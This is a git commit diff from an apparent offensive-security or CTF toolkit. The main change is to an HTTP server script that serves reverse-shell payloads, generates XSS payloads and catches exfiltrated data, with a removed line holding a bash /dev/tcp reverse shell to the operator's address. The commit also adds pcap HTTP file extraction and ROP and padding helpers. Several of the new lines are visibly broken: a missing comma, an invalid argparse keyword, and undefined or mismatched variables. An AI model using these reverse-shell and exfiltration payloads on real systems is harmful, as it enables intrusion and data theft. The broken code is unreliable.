pcap file extract, some bugfix
This commit is contained in:
parent
1a604ca2f3
commit
0ebf221c9c
@ -1,5 +1,6 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import argparse
|
||||||
from http.server import BaseHTTPRequestHandler, HTTPServer
|
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||||
from urllib.parse import urlparse
|
from urllib.parse import urlparse
|
||||||
import threading
|
import threading
|
||||||
@ -245,10 +246,10 @@ class HttpFileServer(HTTPServer):
|
|||||||
protocol = "https" if type(self.socket) == ssl.SSLSocket else "http"
|
protocol = "https" if type(self.socket) == ssl.SSLSocket else "http"
|
||||||
return f"{protocol}://{addr}{port}"
|
return f"{protocol}://{addr}{port}"
|
||||||
|
|
||||||
def get_full_url(self, uri):
|
def get_full_url(self, uri, ip_addr=None):
|
||||||
if not uri.startswith("/"):
|
if not uri.startswith("/"):
|
||||||
uri = "/" + uri
|
uri = "/" + uri
|
||||||
return self.get_base_url() + uri
|
return self.get_base_url(ip_addr) + uri
|
||||||
|
|
||||||
def stop(self):
|
def stop(self):
|
||||||
self.is_running = False
|
self.is_running = False
|
||||||
@ -262,27 +263,57 @@ if __name__ == "__main__":
|
|||||||
print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
|
print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
httpPort = 80
|
parser = argparse.ArgumentParser(description="Spawn a temporary http server")
|
||||||
fileServer = HttpFileServer("0.0.0.0", httpPort)
|
parser.add_argument(
|
||||||
ipAddress = util.get_address()
|
"action",
|
||||||
|
choices=["shell", "dump", "proxy", "xss"],
|
||||||
|
help="Choose one of these actions: shell, dump, proxy, xss"
|
||||||
|
)
|
||||||
|
|
||||||
if sys.argv[1] == "shell":
|
parser.add_argument(
|
||||||
listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
|
"--bind-address",
|
||||||
rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
type=str,
|
||||||
fileServer.addFile("shell.sh", rev_shell)
|
default="0.0.0.0",
|
||||||
fileServer.dumpRequest("/")
|
destination="bind_addr"
|
||||||
print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|
help="Address to bind on (default: 0.0.0.0)"
|
||||||
elif sys.argv[1] == "dump":
|
)
|
||||||
fileServer.dumpRequest("/")
|
|
||||||
print("Exfiltrate data using: http://%s/" % ipAddress)
|
# Optionales Argument: port
|
||||||
elif sys.argv[1] == "proxy":
|
parser.add_argument(
|
||||||
url = "https://google.com" if len(sys.argv) < 3 else sys.argv[2]
|
"--port",
|
||||||
fileServer.forwardRequest("/proxy", url)
|
type=int,
|
||||||
print("Exfiltrate data using: http://%s/proxy" % ipAddress)
|
default=9000,
|
||||||
elif sys.argv[1] == "xss":
|
help="Port to bind on (default: 9000)"
|
||||||
type = "img" if len(sys.argv) < 3 else sys.argv[2]
|
)
|
||||||
xss = xss_handler.generatePayload(type, ipAddress, httpPort)
|
|
||||||
|
parser.add_argument(
|
||||||
|
"--payload",
|
||||||
|
type=str,
|
||||||
|
default=None,
|
||||||
|
help="Payload for xss / shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
file_server = HttpFileServer(args.address, args.port)
|
||||||
|
ip_address = util.get_address()
|
||||||
|
|
||||||
|
if args.action == "shell":
|
||||||
|
payload_type = args.payload if args.payload else "bash"
|
||||||
|
shell_payload = rev_shell.generate_payload(args.payload, ip_address, 4444)
|
||||||
|
file_server.addFile("/shell", rev_shell)
|
||||||
|
print("Reverse Shell URL:", file_server.get_full_url("/shell", ip_address))
|
||||||
|
elif args.action == "dump":
|
||||||
|
file_server.dumpRequest("/")
|
||||||
|
print("Exfiltrate data using:", file_server.get_full_url("/", ip_address))
|
||||||
|
elif args.action == "proxy":
|
||||||
|
url = "https://google.com"
|
||||||
|
file_server.forwardRequest("/proxy", url)
|
||||||
|
print("Exfiltrate data using:", file_server.get_full_url("/proxy", ip_address))
|
||||||
|
elif args.action == "xss":
|
||||||
|
payload_type = args.payload if args.payload else "img"
|
||||||
|
xss = xss_handler.generatePayload(payload_type, ip_addr, args.port)
|
||||||
print("Exfiltrate data using:")
|
print("Exfiltrate data using:")
|
||||||
print(xss)
|
print(xss)
|
||||||
|
|
||||||
fileServer.serve_forever()
|
file_server.serve_forever()
|
||||||
|
38
pcap-file-extract.py
Normal file → Executable file
38
pcap-file-extract.py
Normal file → Executable file
@ -1,3 +1,5 @@
|
|||||||
|
#!/bin/python
|
||||||
|
|
||||||
import argparse
|
import argparse
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
@ -191,7 +193,16 @@ class PcapExtractor:
|
|||||||
self._packets = rdpcap(self.pcap_path)
|
self._packets = rdpcap(self.pcap_path)
|
||||||
|
|
||||||
def extract_all(self):
|
def extract_all(self):
|
||||||
pass
|
self._open_file()
|
||||||
|
http_packets = self._parse_http_packets()
|
||||||
|
filtered_packets = self._apply_filters(http_packets)
|
||||||
|
for packet in filtered_packets:
|
||||||
|
if len(packet.payload) > 0:
|
||||||
|
file_path = packet.get_file_path()
|
||||||
|
with open(os.path.join(self.output_dir, file_path.replace("/", "_")), "wb") as f:
|
||||||
|
f.write(packet.payload)
|
||||||
|
|
||||||
|
print(f"[+] Extracted: {file_path} {util.human_readable_size(len(packet.payload))} Bytes")
|
||||||
|
|
||||||
def _apply_filters(self, packets):
|
def _apply_filters(self, packets):
|
||||||
filtered_packets = packets
|
filtered_packets = packets
|
||||||
@ -207,12 +218,31 @@ class PcapExtractor:
|
|||||||
print(packet)
|
print(packet)
|
||||||
|
|
||||||
def get_http_packet(self, packet_iterator, sock_src, initial_packet):
|
def get_http_packet(self, packet_iterator, sock_src, initial_packet):
|
||||||
http_buffer = bytes(initial_packet[TCP].payload)
|
http_buffer = raw(initial_packet[TCP].payload)
|
||||||
|
prev_seq = initial_packet[TCP].seq
|
||||||
|
buff = None
|
||||||
while packet_iterator.has_more():
|
while packet_iterator.has_more():
|
||||||
next_packet = packet_iterator.peek()
|
next_packet = packet_iterator.peek()
|
||||||
if sock_src == f"{next_packet[IP].src}:{next_packet[TCP].sport}":
|
if sock_src == f"{next_packet[IP].src}:{next_packet[TCP].sport}":
|
||||||
next_packet = packet_iterator.pop()
|
next_packet = packet_iterator.pop()
|
||||||
http_buffer += bytes(next_packet[TCP].payload)
|
|
||||||
|
if buff is not None:
|
||||||
|
# if there is a buffered package, and the seq. number was not reused
|
||||||
|
if buff[0] != next_packet[TCP].seq:
|
||||||
|
# append this to output
|
||||||
|
http_buffer += buff[1]
|
||||||
|
buff = None
|
||||||
|
|
||||||
|
payload_len = len(next_packet[TCP].payload)
|
||||||
|
if next_packet[TCP].seq - prev_seq != payload_len and payload_len == 1:
|
||||||
|
buff = (next_packet[TCP].seq, raw(next_packet[TCP].payload))
|
||||||
|
# potential TCP ZeroWindowProbe
|
||||||
|
continue
|
||||||
|
|
||||||
|
assert next_packet[TCP].seq > prev_seq
|
||||||
|
assert next_packet[IP].frag == 0
|
||||||
|
http_buffer += raw(next_packet[TCP].payload)
|
||||||
|
prev_seq = next_packet[TCP].seq
|
||||||
else:
|
else:
|
||||||
break
|
break
|
||||||
|
|
||||||
@ -268,7 +298,7 @@ if __name__ == "__main__":
|
|||||||
parser.add_argument("-o", "--output-dir", help="Path to destination directory", default="extracted_files/",
|
parser.add_argument("-o", "--output-dir", help="Path to destination directory", default="extracted_files/",
|
||||||
dest="output_dir")
|
dest="output_dir")
|
||||||
parser.add_argument("-l", "--list", help="List available files only", default=False, action="store_true")
|
parser.add_argument("-l", "--list", help="List available files only", default=False, action="store_true")
|
||||||
parser.add_argument("-e", "--extract", help="Extract files (default)", default=None, action="store_true")
|
parser.add_argument("-e", "--extract", help="Extract files (default)", default=True, action="store_true")
|
||||||
parser.add_argument("-ec", "--exclude-codes", help="Exclude http status codes, default: 101,304,403,404",
|
parser.add_argument("-ec", "--exclude-codes", help="Exclude http status codes, default: 101,304,403,404",
|
||||||
default="101,304,403,404", dest="exclude_codes")
|
default="101,304,403,404", dest="exclude_codes")
|
||||||
parser.add_argument("-ic", "--include-codes", help="Limit http status codes", type=str,
|
parser.add_argument("-ic", "--include-codes", help="Limit http status codes", type=str,
|
||||||
|
21
util.py
21
util.py
@ -106,6 +106,16 @@ def assert_not_empty(res, err=None):
|
|||||||
err = f"[-] '{res.url}' did not return any data" if err is None else err
|
err = f"[-] '{res.url}' did not return any data" if err is None else err
|
||||||
exit_with_error(res, err)
|
exit_with_error(res, err)
|
||||||
|
|
||||||
|
def assert_content_contains(res, data, err=None):
|
||||||
|
util.assert_not_empty(res)
|
||||||
|
if isinstance(data, str) and data in res.text:
|
||||||
|
return True
|
||||||
|
elif data in res.content:
|
||||||
|
return True
|
||||||
|
|
||||||
|
err = f"[-] '{res.url}' did not include '{data} in response" if err is None else err
|
||||||
|
exit_with_error(res, err)
|
||||||
|
|
||||||
def assert_json_path(res, path, value, err=None):
|
def assert_json_path(res, path, value, err=None):
|
||||||
assert_content_type(res, "application/json")
|
assert_content_type(res, "application/json")
|
||||||
assert_not_empty(res)
|
assert_not_empty(res)
|
||||||
@ -197,9 +207,18 @@ def genSyscall(elf, syscall, registers):
|
|||||||
rop.raw(rop.find_gadget([syscall_gadget]).address)
|
rop.raw(rop.find_gadget([syscall_gadget]).address)
|
||||||
return rop
|
return rop
|
||||||
|
|
||||||
def pad(x, n, b=b"\x00"):
|
def lpad(x, n, b=b"\x00"):
|
||||||
|
return pad(x, n, b, "l")
|
||||||
|
|
||||||
|
def rpad(x, n, b=b"\x00"):
|
||||||
|
return pad(x, n, b, "r")
|
||||||
|
|
||||||
|
def pad(x, n, b=b"\x00", s="r"):
|
||||||
if len(x) % n != 0:
|
if len(x) % n != 0:
|
||||||
|
if s == "r":
|
||||||
x += (n-(len(x)%n))*b
|
x += (n-(len(x)%n))*b
|
||||||
|
elif s == "l":
|
||||||
|
x = (n-(len(x)%n))*b + x
|
||||||
return x
|
return x
|
||||||
|
|
||||||
def xor(a, b):
|
def xor(a, b):
|
||||||
|
Loading…
Reference in New Issue
Block a user